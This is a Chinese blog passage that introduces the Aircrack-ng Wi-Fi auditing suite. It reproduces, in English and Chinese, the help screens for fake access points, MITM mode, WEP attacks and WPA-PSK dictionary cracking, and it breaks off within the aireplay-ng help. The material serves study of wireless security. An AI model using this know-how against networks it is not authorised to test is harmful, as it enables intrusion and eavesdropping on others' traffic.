Kali-WIFI攻防(二)----无线网络分析工具Aircrack-ng

·  阅读 1259
原文链接: blog.csdn.net

一、工具简介


Aircrack-ng是一个与802.11标准的无线网络分析有关的安全软件,主要功能有:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSK破解,他可以恢复密钥一旦足够的数据包已被抓获,它实现了标准FMS攻击并提供一些优化像Korek攻击,以及全新的PTW攻击,从而更快地攻击比其他WEP破解工具。


Aircrack-ng是一个套件,在该套件中包括很多小工具,如下:


包名称 描述
aircrack-ng 破解WEP以及WPA(字典攻击)密钥
airdecap-ng 通过已知密钥来解密WEP或WPA嗅探数据
airmon-ng 将网卡设定为监听模式
aireplay-ng 数据包注入工具(Linux和Windows使用CommView驱动程序)
airodump-ng 数据包嗅探:将无线网络数据输送到PCAP或IVS文件并显示网络信息
airtun-ng 创建虚拟管道
airolib-ng 保存、管理ESSID密码列表
packetforge-ng 创建数据包注入用的加密包。
Tools 混合、转换工具
airbase-ng 软件模拟AP
airdecloak-ng 消除pcap文件中的WEP加密
airdriver-ng 无线设备驱动管理工具
airolib-ng 保存、管理ESSID密码列表,计算对应的密钥
airserv-ng 允许不同的进程访问无线网卡
buddy-ng easside-ng的文件描述
easside-ng 和AP接入点通讯(无WEP)
tkiptun-ng WPA/TKIP攻击
wesside-ng 自动破解WEP密钥

二、aircrack-ng工具包

1、airbase-ng – 配置假接入点




[html] view plain copy print?
  1. root@kali:~# airbase-ng --help  
  2.   
  3.   Airbase-ng 1.2 beta3 - (C) 2008-2013 Thomas d'Otreppe  
  4.   Original work: Martin Beck  
  5.   http://www.aircrack-ng.org  
  6.   
  7.   usage: airbase-ng <options> <replay interface >  
  8.   
  9.   Options:  
  10.   
  11.       -a bssid         : set Access Point MAC address  
  12.       -i iface         : capture packets from this interface  
  13.       -w WEP key       : use this WEP key to en-/decrypt packets  
  14.       -h MAC           : source mac for MITM mode  
  15.       -f disallow      : disallow specified client MACs (default: allow)  
  16.       -W 0|1           : [don't] set WEP flag in beacons 0|1 (default: auto)  
  17.       -q               : quiet (do not print statistics)  
  18.       -v               : verbose (print more messages)  
  19.       -A               : Ad-Hoc Mode (allows other clients to peer)  
  20.       -Y in|out|both   : external packet processing  
  21.       -c channel       : sets the channel the AP is running on  
  22.       -X               : hidden ESSID  
  23.       -s               : force shared key authentication (default: auto)  
  24.       -S               : set shared key challenge length (default: 128)  
  25.       -L               : Caffe-Latte WEP attack (use if driver can't send frags)  
  26.       -N               : cfrag WEP attack (recommended)  
  27.       -x nbpps         : number of packets per second (default: 100)  
  28.       -y               : disables responses to broadcast probes  
  29.       -0               : set all WPA,WEP,open tags. can't be used with -z & -Z  
  30.       -z type          : sets WPA1 tags. 1= WEP40 2=TKIP 3= WRAP 4=CCMP 5= WEP104  
  31.       -Z type          : same as -z, but for WPA2  
  32.       -V type          : fake EAPOL 1= MD5 2=SHA1 3= auto  
  33.       -F prefix        : write all sent and received frames into pcap file  
  34.       -P               : respond to all probes, even when specifying ESSIDs  
  35.       -I interval      : sets the beacon interval value in ms  
  36.       -C seconds       : enables beaconing of probed ESSID values (requires -P)  
  37.   
  38.   Filter options:  
  39.       --bssid MAC      : BSSID to filter/use  
  40.       --bssids file    : read a list of BSSIDs out of that file  
  41.       --client MAC     : MAC of client to filter  
  42.       --clients file   : read a list of MACs out of that file  
  43.       --essid ESSID    : specify a single ESSID (default: default)  
  44.       --essids file    : read a list of ESSIDs out of that file  
  45.   
  46.       --help           : Displays this usage screen  
root@kali:~# airbase-ng --help

  Airbase-ng 1.2 beta3 - (C) 2008-2013 Thomas d'Otreppe
  Original work: Martin Beck
  http://www.aircrack-ng.org

  usage: airbase-ng <options> <replay interface>

  Options:

      -a bssid         : set Access Point MAC address
      -i iface         : capture packets from this interface
      -w WEP key       : use this WEP key to en-/decrypt packets
      -h MAC           : source mac for MITM mode
      -f disallow      : disallow specified client MACs (default: allow)
      -W 0|1           : [don't] set WEP flag in beacons 0|1 (default: auto)
      -q               : quiet (do not print statistics)
      -v               : verbose (print more messages)
      -A               : Ad-Hoc Mode (allows other clients to peer)
      -Y in|out|both   : external packet processing
      -c channel       : sets the channel the AP is running on
      -X               : hidden ESSID
      -s               : force shared key authentication (default: auto)
      -S               : set shared key challenge length (default: 128)
      -L               : Caffe-Latte WEP attack (use if driver can't send frags)
      -N               : cfrag WEP attack (recommended)
      -x nbpps         : number of packets per second (default: 100)
      -y               : disables responses to broadcast probes
      -0               : set all WPA,WEP,open tags. can't be used with -z & -Z
      -z type          : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
      -Z type          : same as -z, but for WPA2
      -V type          : fake EAPOL 1=MD5 2=SHA1 3=auto
      -F prefix        : write all sent and received frames into pcap file
      -P               : respond to all probes, even when specifying ESSIDs
      -I interval      : sets the beacon interval value in ms
      -C seconds       : enables beaconing of probed ESSID values (requires -P)

  Filter options:
      --bssid MAC      : BSSID to filter/use
      --bssids file    : read a list of BSSIDs out of that file
      --client MAC     : MAC of client to filter
      --clients file   : read a list of MACs out of that file
      --essid ESSID    : specify a single ESSID (default: default)
      --essids file    : read a list of ESSIDs out of that file

      --help           : Displays this usage screen复制代码

中文对照:

[html] view plain copy print?
  1. root@kali:~# airbase-ng --help  
  2.   
  3.   Airbase-ng 1.2 beta3 - (C) 2008-2013 Thomas d'Otreppe  
  4.   Original work: Martin Beck  
  5.   http://www.aircrack-ng.org  
  6.   
  7.   usage: airbase-ng <options> <replay interface >  
  8.   
  9.   选项:  
  10.   
  11.       -a bssid         : 设置接入点MAC地址  
  12.       -i iface         : 从该接口捕获数据包  
  13.       -w WEP key       : 使用此WEP密钥来对/解密数据包  
  14.       -h MAC           : 源MAC为MITM模式  
  15.       -f disallow      : 禁止指定的客户端MAC(默认值:allow)  
  16.       -W 0|1           : [don't] 在信标中设置WEP标志0 | 1(默认值:auto)  
  17.       -q               : 安静(不打印统计)  
  18.       -v               : 详细(打印更多信息)  
  19.       -A               : Ad-Hoc模式(允许其他客户端对等)  
  20.       -Y in|out|both   : 外部数据包处理  
  21.       -c channel       : 设置AP正在运行的通道  
  22.       -X               : 隐藏SSID  
  23.       -s               : 强制共享密钥验证(默认值:auto)  
  24.       -S               : 设置共享密钥挑战长度(默认值:128)  
  25.       -L               : Caffe-Latte WEP攻击(如果驱动程序无法发送碎片,则使用)  
  26.       -N               : cfrag WEP攻击(推荐)  
  27.       -x nbpps         : 每秒数据包数(默认值:100)  
  28.       -y               : 禁用对广播探测器的响应  
  29.       -0               : 设置所有WPA,WEP,打开标签。 不能与-z & -Z一起使用  
  30.       -z type          : 设置WPA1标签。 1 = WEP40  2 = TKIP 3 = WRAP  4 = CCMP 5 = WEP104  
  31.       -Z type          : 与-z相同,但对于WPA2  
  32.       -V type          : fake EAPOL 1=MD5  2=SHA1 3=auto  
  33.       -F prefix        : 将所有发送和接收的帧写入pcap文件  
  34.       -P               : 即使指定ESSID,也可以对所有探测器进行响应  
  35.       -I interval      : 设置信标间隔值,单位为ms  
  36.       -C seconds       : 使得探测到的ESSID值(需要-P)  
  37.   
  38.   过滤选项:  
  39.       --bssid MAC      : BSSID过滤/使用  
  40.       --bssids file    : 读取该文件中的BSSID列表  
  41.       --client MAC     : MAC客户端进行过滤  
  42.       --clients file   : 从该文件中读取MAC列表  
  43.       --essid ESSID    : 指定单个ESSID(默认值:默认值)  
  44.       --essids file    : 从该文件中读取ESSID列表  
  45.   
  46.       --help           : 显示帮助  
root@kali:~# airbase-ng --help

  Airbase-ng 1.2 beta3 - (C) 2008-2013 Thomas d'Otreppe
  Original work: Martin Beck
  http://www.aircrack-ng.org

  usage: airbase-ng <options> <replay interface>

  选项:

      -a bssid         : 设置接入点MAC地址
      -i iface         : 从该接口捕获数据包
      -w WEP key       : 使用此WEP密钥来对/解密数据包
      -h MAC           : 源MAC为MITM模式
      -f disallow      : 禁止指定的客户端MAC(默认值:allow)
      -W 0|1           : [don't] 在信标中设置WEP标志0 | 1(默认值:auto)
      -q               : 安静(不打印统计)
      -v               : 详细(打印更多信息)
      -A               : Ad-Hoc模式(允许其他客户端对等)
      -Y in|out|both   : 外部数据包处理
      -c channel       : 设置AP正在运行的通道
      -X               : 隐藏SSID
      -s               : 强制共享密钥验证(默认值:auto)
      -S               : 设置共享密钥挑战长度(默认值:128)
      -L               : Caffe-Latte WEP攻击(如果驱动程序无法发送碎片,则使用)
      -N               : cfrag WEP攻击(推荐)
      -x nbpps         : 每秒数据包数(默认值:100)
      -y               : 禁用对广播探测器的响应
      -0               : 设置所有WPA,WEP,打开标签。 不能与-z & -Z一起使用
      -z type          : 设置WPA1标签。 1 = WEP40 2 = TKIP 3 = WRAP 4 = CCMP 5 = WEP104
      -Z type          : 与-z相同,但对于WPA2
      -V type          : fake EAPOL 1=MD5 2=SHA1 3=auto
      -F prefix        : 将所有发送和接收的帧写入pcap文件
      -P               : 即使指定ESSID,也可以对所有探测器进行响应
      -I interval      : 设置信标间隔值,单位为ms
      -C seconds       : 使得探测到的ESSID值(需要-P)

  过滤选项:
      --bssid MAC      : BSSID过滤/使用
      --bssids file    : 读取该文件中的BSSID列表
      --client MAC     : MAC客户端进行过滤
      --clients file   : 从该文件中读取MAC列表
      --essid ESSID    : 指定单个ESSID(默认值:默认值)
      --essids file    : 从该文件中读取ESSID列表

      --help           : 显示帮助复制代码

2、aircrack-ng – 无线密码破解

[html] view plain copy print?
  1. root@kali:~# aircrack-ng --help  
  2.   
  3.   Aircrack-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe  
  4.   http://www.aircrack-ng.org  
  5.   
  6.   usage: aircrack-ng [options] <.cap / .ivs file(s)>  
  7.   
  8.   Common options:  
  9.   
  10.       -a <amode> : force attack mode (1/WEP, 2/WPA-PSK)  
  11.       -e <essid> : target selection: network identifier  
  12.       -b <bssid> : target selection: access point's MAC  
  13.       -p <nbcpu> : # of CPU to use  (default: all CPUs)  
  14.       -q         : enable quiet mode (no status output)  
  15.       -C <macs>  : merge the given APs to a virtual one  
  16.       -l <file>  : write key to file  
  17.   
  18.   Static WEP cracking options:  
  19.   
  20.       -c         : search alpha-numeric characters only  
  21.       -t         : search binary coded decimal chr only  
  22.       -h         : search the numeric key for Fritz!BOX  
  23.       -d <mask>  : use masking of the key (A1:XX:CF:YY)  
  24.       -m <maddr> : MAC address to filter usable packets  
  25.       -n <nbits> : WEP key length :  64/128/152/256/512  
  26.       -i <index> : WEP key index (1 to 4), default: any  
  27.       -f <fudge> : bruteforce fudge factor,  default: 2  
  28.       -k <korek> : disable one attack method  (1 to 17)  
  29.       -x or -x0  : disable bruteforce for last keybytes  
  30.       -x1        : last keybyte bruteforcing  (default)  
  31.       -x2        : enable last  2 keybytes bruteforcing  
  32.       -X         : disable  bruteforce   multithreading  
  33.       -y         : experimental  single bruteforce mode  
  34.       -K         : use only old KoreK attacks (pre-PTW)  
  35.       -s         : show the key in ASCII while cracking  
  36.       -M <num>   : specify maximum number of IVs to use  
  37.       -D         : WEP decloak, skips broken keystreams  
  38.       -P <num>   : PTW debug:  1: disable Klein, 2: PTW  
  39.       -1         : run only 1 try to crack key with PTW  
  40.   
  41.   WEP and WPA-PSK cracking options:  
  42.   
  43.       -w <words> : path to wordlist(s) filename(s)  
  44.   
  45.   WPA-PSK options:  
  46.   
  47.       -E <file>  : create EWSA Project file v3  
  48.       -J <file>  : create Hashcat Capture file  
  49.       -S         : WPA cracking speed test  
  50.   
  51.   Other options:  
  52.   
  53.       -u         : Displays # of CPUs & MMX/SSE support  
  54.       --help     : Displays this usage screen  
root@kali:~# aircrack-ng --help

  Aircrack-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
  http://www.aircrack-ng.org

  usage: aircrack-ng [options] <.cap / .ivs file(s)>

  Common options:

      -a <amode> : force attack mode (1/WEP, 2/WPA-PSK)
      -e <essid> : target selection: network identifier
      -b <bssid> : target selection: access point's MAC
      -p <nbcpu> : # of CPU to use  (default: all CPUs)
      -q         : enable quiet mode (no status output)
      -C <macs>  : merge the given APs to a virtual one
      -l <file>  : write key to file

  Static WEP cracking options:

      -c         : search alpha-numeric characters only
      -t         : search binary coded decimal chr only
      -h         : search the numeric key for Fritz!BOX
      -d <mask>  : use masking of the key (A1:XX:CF:YY)
      -m <maddr> : MAC address to filter usable packets
      -n <nbits> : WEP key length :  64/128/152/256/512
      -i <index> : WEP key index (1 to 4), default: any
      -f <fudge> : bruteforce fudge factor,  default: 2
      -k <korek> : disable one attack method  (1 to 17)
      -x or -x0  : disable bruteforce for last keybytes
      -x1        : last keybyte bruteforcing  (default)
      -x2        : enable last  2 keybytes bruteforcing
      -X         : disable  bruteforce   multithreading
      -y         : experimental  single bruteforce mode
      -K         : use only old KoreK attacks (pre-PTW)
      -s         : show the key in ASCII while cracking
      -M <num>   : specify maximum number of IVs to use
      -D         : WEP decloak, skips broken keystreams
      -P <num>   : PTW debug:  1: disable Klein, 2: PTW
      -1         : run only 1 try to crack key with PTW

  WEP and WPA-PSK cracking options:

      -w <words> : path to wordlist(s) filename(s)

  WPA-PSK options:

      -E <file>  : create EWSA Project file v3
      -J <file>  : create Hashcat Capture file
      -S         : WPA cracking speed test

  Other options:

      -u         : Displays # of CPUs & MMX/SSE support
      --help     : Displays this usage screen复制代码

中文对照:

[html] view plain copy print?
  1. root@kali:~# aircrack-ng --help  
  2.   
  3.   Aircrack-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe  
  4.   http://www.aircrack-ng.org  
  5.   
  6.   usage: aircrack-ng [options] <.cap / .ivs file(s)>  
  7.   
  8.   常用选项:  
  9.   
  10.       -a <amode> : 强力攻击模式 (1/WEP, 2/WPA-PSK)  
  11.       -e <essid> : 目标选择:网络标识符  
  12.       -b <bssid> : 目标选择:接入点的MAC  
  13.       -p <nbcpu> : # 使用的CPU  (默认: 所以CPU)  
  14.       -q         : 启用静音模式(无状态输出)  
  15.       -C <macs>  : 将给定的AP合并到一个虚拟的AP  
  16.       -l <file>  : 写入文件的密钥  
  17.   
  18.   静态WEP破解选项:  
  19.   
  20.       -c         : 仅搜索字母数字字符  
  21.       -t         : 仅搜索二进制编码的十进制chr  
  22.       -h         : search the numeric key for Fritz!BOX 搜索Fritz!BOX的数字键  
  23.       -d <mask>  : 使用键的掩码 (A1:XX:CF:YY)  
  24.       -m <maddr> : MAC地址过滤可用的数据包  
  25.       -n <nbits> : WEP密钥长度 :  64/128/152/256/512  
  26.       -i <index> : WEP密钥索引(1到4),默认值:any  
  27.       -f <fudge> : bruteforce fudge factor,  default: 2  
  28.       -k <korek> : 禁用一种攻击方法(1到17)  
  29.       -x or -x0  : disable bruteforce for last keybytes 禁用最后一个密钥串的bruteforce  
  30.       -x1        : 最后一个关键字节强制(默认)  
  31.       -x2        : 启用最后2个密码子 强制  
  32.       -X         : 禁用bruteforce多线程  
  33.       -y         : 实验单强制模式  
  34.       -K         : 只使用旧的KoreK攻击 (pre-PTW)  
  35.       -s         : 在打开时显示ASCII码的关键字  
  36.       -M <num>   : 指定最多使用的IV  
  37.       -D         : WEP decloak, skips broken keystreams WEP密钥序列的隐形,跳过了  
  38.       -P <num>   : PTW debug:  1: disable Klein, 2: PTW PTW调试:1:禁用Klein,2:PTW  
  39.       -1         : 只运行1次尝试用PTW破解密钥  
  40.   
  41.   WEP和WPA-PSK破解选项:  
  42.   
  43.       -w <words> : 路径表(S)的文件名(S)  
  44.   
  45.   WPA-PSK选项:  
  46.   
  47.       -E <file>  : 创建项目文件ewsa V3  
  48.       -J <file>  : 创建Hashcat捕获文件  
  49.       -S         : WPA破解速度测试  
  50.   
  51.   其他选项:  
  52.   
  53.       -u         : 显示CPU数量和MMX / SSE支持  
  54.       --help     : 显示帮助  
root@kali:~# aircrack-ng --help

  Aircrack-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
  http://www.aircrack-ng.org

  usage: aircrack-ng [options] <.cap / .ivs file(s)>

  常用选项:

      -a <amode> : 强力攻击模式 (1/WEP, 2/WPA-PSK)
      -e <essid> : 目标选择:网络标识符
      -b <bssid> : 目标选择:接入点的MAC
      -p <nbcpu> : # 使用的CPU  (默认: 所以CPU)
      -q         : 启用静音模式(无状态输出)
      -C <macs>  : 将给定的AP合并到一个虚拟的AP
      -l <file>  : 写入文件的密钥

  静态WEP破解选项:

      -c         : 仅搜索字母数字字符
      -t         : 仅搜索二进制编码的十进制chr
      -h         : search the numeric key for Fritz!BOX 搜索Fritz!BOX的数字键
      -d <mask>  : 使用键的掩码 (A1:XX:CF:YY)
      -m <maddr> : MAC地址过滤可用的数据包
      -n <nbits> : WEP密钥长度 :  64/128/152/256/512
      -i <index> : WEP密钥索引(1到4),默认值:any
      -f <fudge> : bruteforce fudge factor,  default: 2
      -k <korek> : 禁用一种攻击方法(1到17)
      -x or -x0  : disable bruteforce for last keybytes 禁用最后一个密钥串的bruteforce
      -x1        : 最后一个关键字节强制(默认)
      -x2        : 启用最后2个密码子 强制
      -X         : 禁用bruteforce多线程
      -y         : 实验单强制模式
      -K         : 只使用旧的KoreK攻击 (pre-PTW)
      -s         : 在打开时显示ASCII码的关键字
      -M <num>   : 指定最多使用的IV
      -D         : WEP decloak, skips broken keystreams WEP密钥序列的隐形,跳过了
      -P <num>   : PTW debug:  1: disable Klein, 2: PTW PTW调试:1:禁用Klein,2:PTW
      -1         : 只运行1次尝试用PTW破解密钥

  WEP和WPA-PSK破解选项:

      -w <words> : 路径表(S)的文件名(S)

  WPA-PSK选项:

      -E <file>  : 创建项目文件ewsa V3
      -J <file>  : 创建Hashcat捕获文件
      -S         : WPA破解速度测试

  其他选项:

      -u         : 显示CPU数量和MMX / SSE支持
      --help     : 显示帮助复制代码


3、airdecap-ng – 解密WEP/WPA/WPA2捕获文件

[html] view plain copy print?
  1. root@kali:~# airdecap-ng --help  
  2.   
  3.   Airdecap-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe  
  4.   http://www.aircrack-ng.org  
  5.   
  6.   usage: airdecap-ng [options] <pcap file>  
  7.   
  8.   Common options:  
  9.       -l         : don't remove the 802.11 header  
  10.       -b <bssid> : access point MAC address filter  
  11.       -e <essid> : target network SSID  
  12.   
  13.   WEP specific option:  
  14.       -w <key>   : target network WEP key in hex  
  15.   
  16.   WPA specific options:  
  17.       -p <pass>  : target network WPA passphrase  
  18.       -k <pmk>   : WPA Pairwise Master Key in hex  
  19.   
  20.       --help     : Displays this usage screen  
root@kali:~# airdecap-ng --help

  Airdecap-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
  http://www.aircrack-ng.org

  usage: airdecap-ng [options] <pcap file>

  Common options:
      -l         : don't remove the 802.11 header
      -b <bssid> : access point MAC address filter
      -e <essid> : target network SSID

  WEP specific option:
      -w <key>   : target network WEP key in hex

  WPA specific options:
      -p <pass>  : target network WPA passphrase
      -k <pmk>   : WPA Pairwise Master Key in hex

      --help     : Displays this usage screen复制代码

中文对照版:

[html] view plain copy print?
  1. root@kali:~# airdecap-ng --help  
  2.   
  3.   Airdecap-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe  
  4.   http://www.aircrack-ng.org  
  5.   
  6.   usage: airdecap-ng [options] <pcap file>  
  7.   
  8.   常用选项:  
  9.       -l         : 不要删除802.11头  
  10.       -b <bssid> : 接入点MAC地址过滤器  
  11.       -e <essid> : 目标网络SSID  
  12.   
  13.   WEP具体选项:  
  14.       -w <key>   : 目标网络WEP密钥为十六进制  
  15.   
  16.   WPA具体选项:  
  17.       -p <pass>  : 目标网络WPA密码  
  18.       -k <pmk>   : WPA成对主密钥为十六进制  
  19.   
  20.       --help     : 显示帮助  
root@kali:~# airdecap-ng --help

  Airdecap-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe
  http://www.aircrack-ng.org

  usage: airdecap-ng [options] <pcap file>

  常用选项:
      -l         : 不要删除802.11头
      -b <bssid> : 接入点MAC地址过滤器
      -e <essid> : 目标网络SSID

  WEP具体选项:
      -w <key>   : 目标网络WEP密钥为十六进制

  WPA具体选项:
      -p <pass>  : 目标网络WPA密码
      -k <pmk>   : WPA成对主密钥为十六进制

      --help     : 显示帮助复制代码

4、airdecloak-ng – 从pcap文件中删除伪装

[html] view plain copy print?
  1. root@kali:~# airdecloak-ng --help  
  2.   
  3.   Airdecloak-ng 1.2 beta3 - (C) 2008-2013 Thomas d'Otreppe  
  4.   http://www.aircrack-ng.org  
  5.   
  6.   usage: airdecloak-ng [options]  
  7.   
  8.   options:  
  9.   
  10.    Mandatory:  
  11.      -i <file>             : Input capture file  
  12.      --ssid <ESSID>        : ESSID of the network to filter  
  13.         or  
  14.      --bssid <BSSID>       : BSSID of the network to filter  
  15.   
  16.    Optional:  
  17.      --filters <filters>   : Apply filters (separated by a comma). Filters:  
  18.            signal:               Try to filter based on signal.  
  19.            duplicate_sn:         Remove all duplicate sequence numbers  
  20.                                  for both the AP and the client.  
  21.            duplicate_sn_ap:      Remove duplicate sequence number for  
  22.                                  the AP only.  
  23.            duplicate_sn_client:  Remove duplicate sequence number for the  
  24.                                  client only.  
  25.            consecutive_sn:       Filter based on the fact that IV should  
  26.                                  be consecutive (only for AP).  
  27.            duplicate_iv:         Remove all duplicate IV.  
  28.            signal_dup_consec_sn: Use signal (if available), duplicate and  
  29.                                  consecutive sequence number (filtering is  
  30.                                   much more precise than using all these  
  31.                                   filters one by one).  
  32.      --null-packets        : Assume that null packets can be cloaked.  
  33.      --disable-base_filter : Do not apply base filter.  
  34.      --drop-frag           : Drop fragmented packets  
  35.   
  36.      --help                : Displays this usage screen  
root@kali:~# airdecloak-ng --help

  Airdecloak-ng 1.2 beta3 - (C) 2008-2013 Thomas d'Otreppe
  http://www.aircrack-ng.org

  usage: airdecloak-ng [options]

  options:

   Mandatory:
     -i <file>             : Input capture file
     --ssid <ESSID>        : ESSID of the network to filter
        or
     --bssid <BSSID>       : BSSID of the network to filter

   Optional:
     --filters <filters>   : Apply filters (separated by a comma). Filters:
           signal:               Try to filter based on signal.
           duplicate_sn:         Remove all duplicate sequence numbers
                                 for both the AP and the client.
           duplicate_sn_ap:      Remove duplicate sequence number for
                                 the AP only.
           duplicate_sn_client:  Remove duplicate sequence number for the
                                 client only.
           consecutive_sn:       Filter based on the fact that IV should
                                 be consecutive (only for AP).
           duplicate_iv:         Remove all duplicate IV.
           signal_dup_consec_sn: Use signal (if available), duplicate and
                                 consecutive sequence number (filtering is
                                  much more precise than using all these
                                  filters one by one).
     --null-packets        : Assume that null packets can be cloaked.
     --disable-base_filter : Do not apply base filter.
     --drop-frag           : Drop fragmented packets

     --help                : Displays this usage screen复制代码

中文对照版:

[html] view plain copy print?
  1. root@kali:~# airdecloak-ng --help  
  2.   
  3.   Airdecloak-ng 1.2 beta3 - (C) 2008-2013 Thomas d'Otreppe  
  4.   http://www.aircrack-ng.org  
  5.   
  6.   usage: airdecloak-ng [options]  
  7.   
  8.   选项:  
  9.   
  10.    强制性:  
  11.      -i <file>             : 输入捕获文件  
  12.      --ssid <ESSID>        : 网络的ESSID进行过滤  
  13.         or  
  14.      --bssid <BSSID>       : 要过滤网络的BSSID  
  15.   
  16.    可选的:  
  17.      --filters <filters>   : 应用过滤器(用逗号分隔). 过滤器:  
  18.            signal:               尝试根据信号过滤.  
  19.            duplicate_sn:         删除AP和客户端的所有重复序列号。  
  20.            duplicate_sn_ap:      删除AP的重复序列号。  
  21.            duplicate_sn_client:  删除客户端的重复序列号。  
  22.            consecutive_sn:       基于这样的事实,IV应该是连续的(仅适用于AP)过滤器。  
  23.            duplicate_iv:         删除所有重复的IV。  
  24.            signal_dup_consec_sn: 使用信号(如果可用),重复和连续的序列号(过滤比使用所有这些过滤器更加精确得多)。  
  25.      --null-packets        : 假设空数据包可以隐藏.  
  26.      --disable-base_filter : 不要使用基础过滤器。  
  27.      --drop-frag           : 丢弃分片包  
  28.   
  29.      --help                : 显示帮助  
root@kali:~# airdecloak-ng --help

  Airdecloak-ng 1.2 beta3 - (C) 2008-2013 Thomas d'Otreppe
  http://www.aircrack-ng.org

  usage: airdecloak-ng [options]

  选项:

   强制性:
     -i <file>             : 输入捕获文件
     --ssid <ESSID>        : 网络的ESSID进行过滤
        or
     --bssid <BSSID>       : 要过滤网络的BSSID

   可选的:
     --filters <filters>   : 应用过滤器(用逗号分隔). 过滤器:
           signal:               尝试根据信号过滤.
           duplicate_sn:         删除AP和客户端的所有重复序列号。
           duplicate_sn_ap:      删除AP的重复序列号。
           duplicate_sn_client:  删除客户端的重复序列号。
           consecutive_sn:       基于这样的事实,IV应该是连续的(仅适用于AP)过滤器。
           duplicate_iv:         删除所有重复的IV。
           signal_dup_consec_sn: 使用信号(如果可用),重复和连续的序列号(过滤比使用所有这些过滤器更加精确得多)。
     --null-packets        : 假设空数据包可以隐藏.
     --disable-base_filter : 不要使用基础过滤器。
     --drop-frag           : 丢弃分片包

     --help                : 显示帮助复制代码

5、airdriver-ng – 提供有关系统上无线驱动程序的状态信息

[html] view plain copy print?
  1. root@kali:~# airdriver-ng --help  
  2. Found kernel: 3.3.12-kali1-686-pae.3.12-kali1-686-pae  
  3. usage: airdriver-ng <command> [drivernumber]  
  4.     valid commands:  
  5.         supported       - lists all supported drivers  
  6.         kernel          - lists all in-kernel drivers  
  7.         installed       - lists all installed drivers  
  8.         loaded          - lists all loaded drivers  
  9.         -----------------------------------------------------  
  10.         insert <drivernum>  - inserts a driver  
  11.         load <drivernum>    - loads a driver  
  12.         unload <drivernum>  - unloads a driver  
  13.         reload <drivernum>  - reloads a driver  
  14.         -----------------------------------------------------  
  15.         compile <drivernum> - compiles a driver  
  16.         install <drivernum> - installs a driver  
  17.         remove <drivernum>  - removes a driver  
  18.         -----------------------------------------------------  
  19.         compile_stack <stacknum>    - compiles a stack  
  20.         install_stack <stacknum>    - installs a stack  
  21.         remove_stack <stacknum> - removes a stack  
  22.         -----------------------------------------------------  
  23.         install_firmware <drivernum>    - installs the firmware  
  24.         remove_firmware <drivernum> - removes the firmware  
  25.         -----------------------------------------------------  
  26.         details <drivernum> - prints driver details  
  27.         detect          - detects wireless cards  
root@kali:~# airdriver-ng --help
Found kernel: 3.3.12-kali1-686-pae.3.12-kali1-686-pae
usage: airdriver-ng <command> [drivernumber]
    valid commands:
        supported       - lists all supported drivers
        kernel          - lists all in-kernel drivers
        installed       - lists all installed drivers
        loaded          - lists all loaded drivers
        -----------------------------------------------------
        insert <drivernum>  - inserts a driver
        load <drivernum>    - loads a driver
        unload <drivernum>  - unloads a driver
        reload <drivernum>  - reloads a driver
        -----------------------------------------------------
        compile <drivernum> - compiles a driver
        install <drivernum> - installs a driver
        remove <drivernum>  - removes a driver
        -----------------------------------------------------
        compile_stack <stacknum>    - compiles a stack
        install_stack <stacknum>    - installs a stack
        remove_stack <stacknum> - removes a stack
        -----------------------------------------------------
        install_firmware <drivernum>    - installs the firmware
        remove_firmware <drivernum> - removes the firmware
        -----------------------------------------------------
        details <drivernum> - prints driver details
        detect          - detects wireless cards复制代码


中文对照版:

[html] view plain copy print?
  1. root@kali:~# airdriver-ng --help  
  2. Found kernel: 3.3.12-kali1-686-pae.3.12-kali1-686-pae  
  3. usage: airdriver-ng <command> [drivernumber]  
  4. 有效命令:  
  5.     supported       - 列出所有支持的驱动程序  
  6.     kernel          - 列出所有内核驱动程序  
  7.     installed       - 列出所有已安装的驱动程序  
  8.     loaded          - 列出所有加载的驱动程序  
  9.     -----------------------------------------------------  
  10.     insert <drivernum>  - 插入驱动程序  
  11.     load <drivernum>    - 加载驱动程序  
  12.     unload <drivernum>  - 卸载驱动程序  
  13.     reload <drivernum>  - 重新加载驱动程序  
  14.     -----------------------------------------------------  
  15.     compile <drivernum> - 编译驱动程序  
  16.     install <drivernum> - 安装驱动程序  
  17.     remove <drivernum>  - 删除驱动程序  
  18.     -----------------------------------------------------  
  19.     compile_stack <stacknum>    - 编译一个堆栈  
  20.     install_stack <stacknum>    - 安装一个堆栈  
  21.     remove_stack <stacknum> - 删除堆栈  
  22.     -----------------------------------------------------  
  23.     install_firmware <drivernum>    - 安装固件  
  24.     remove_firmware <drivernum> - 删除固件  
  25.     -----------------------------------------------------  
  26.     details <drivernum> - 打印驱动程序详细信息  
  27.     detect          - 检测无线网卡  
root@kali:~# airdriver-ng --help
Found kernel: 3.3.12-kali1-686-pae.3.12-kali1-686-pae
usage: airdriver-ng <command> [drivernumber]
有效命令:
	supported       - 列出所有支持的驱动程序
	kernel          - 列出所有内核驱动程序
	installed       - 列出所有已安装的驱动程序
	loaded          - 列出所有加载的驱动程序
	-----------------------------------------------------
	insert <drivernum>  - 插入驱动程序
	load <drivernum>    - 加载驱动程序
	unload <drivernum>  - 卸载驱动程序
	reload <drivernum>  - 重新加载驱动程序
	-----------------------------------------------------
	compile <drivernum> - 编译驱动程序
	install <drivernum> - 安装驱动程序
	remove <drivernum>  - 删除驱动程序
	-----------------------------------------------------
	compile_stack <stacknum>    - 编译一个堆栈
	install_stack <stacknum>    - 安装一个堆栈
	remove_stack <stacknum> - 删除堆栈
	-----------------------------------------------------
	install_firmware <drivernum>    - 安装固件
	remove_firmware <drivernum> - 删除固件
	-----------------------------------------------------
	details <drivernum> - 打印驱动程序详细信息
	detect          - 检测无线网卡复制代码


6、aireplay-ng – 主要功能是产生流量以供以后在aircrack-ng中使用

[html] view plain copy print?
  1. root@kali:~# aireplay-ng --help  
  2.   
  3.   Aireplay-ng 1.2 beta3 - (C) 2006-2013 Thomas d'Otreppe  
  4.   http://www.aircrack-ng.org  
  5.   
  6.   usage: aireplay-ng <options> <replay interface >  
  7.   
  8.   Filter options:  
  9.   
  10.       -b bssid  : MAC address, Access Point  
  11.       -d dmac   : MAC address, Destination  
